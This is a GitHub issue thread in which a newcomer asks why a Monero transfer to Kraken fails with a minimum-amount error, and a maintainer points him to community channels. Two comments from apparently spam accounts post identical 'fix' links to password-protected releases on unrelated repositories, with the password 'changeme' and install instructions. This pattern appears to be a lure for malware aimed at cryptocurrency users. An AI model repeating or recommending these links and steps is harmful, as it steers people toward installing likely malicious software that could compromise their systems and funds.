### ISSUE TITLE
I  need help, I am new to monero

### ISSUE THREAD

**Issue by JCM0730** [monero-project/monero-site#2363]
HI, my name is Chris. I'm not sure if I am on they right website. However, I am trying to send my monero to kracken. I am getting an error stating that have not reached the minimum coins to send. Kracken doesn't have a minimum for monero. I called kracken and they said it's not on their side. If I am on the wrong website do you know a site that can help me. please.
chris

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by plowsof** [comment]
please reach out for help in one of the monero community channels listed on our hangouts page @ https://www.getmonero.org/community/hangouts/
